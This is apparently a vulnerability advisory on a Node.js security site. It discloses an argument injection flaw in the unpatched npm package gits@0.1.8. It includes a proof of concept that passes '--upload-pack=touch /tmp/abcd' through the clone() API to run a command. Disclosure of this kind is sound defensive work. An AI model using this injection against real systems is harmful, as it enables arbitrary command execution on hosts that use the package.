🦄 Node.js Security

~ 1 min read

Argument Injection vulnerability in `gits@0.1.8`

share on
An Argument Injection vulnerability was discovered in the `gits` npm package that could allow attackers to execute arbitrary commands on the host

The gits npm package describes itself as a Local promise-returning git command wrappers for Node.js. Attempts to contact the maintainer through the GitHub repository through an open issue were not responded to, and the vulnerability remains unpatched.

Resources:

Background on exploitation

I’m reporting an Argument Injection vulnerability in gits npm package.

This vulnerability manifests with the library’s clone(dir, repo, branch, cwd) API, which allows user input to specify the branch, repo, and other metadata. When some of that input to the function is controlled by the user, it may cause a command injection.

Exploit

  1. Install gits@0.1.8 or earlier
  2. Create the empty directory /tmp/balloon to hold the repository to clone to
  3. Establish the following POC:
var gits = require("gits");


gits.clone(
  "/tmp/balloon",
  "file:///tmp/none",
  "master",
  "--upload-pack=touch /tmp/abcd"
);
  1. Observe new file created on disk at /tmp/abcd

Node.js Security Newsletter

Subscribe to get everything in and around the Node.js security ecosystem, direct to your inbox.

    JavaScript & web security insights, latest security vulnerabilities, hands-on secure code insights, npm ecosystem incidents, Node.js runtime feature updates, Bun and Deno runtime updates, secure coding best practices, malware, malicious packages, and more.

    Built with ConvertKit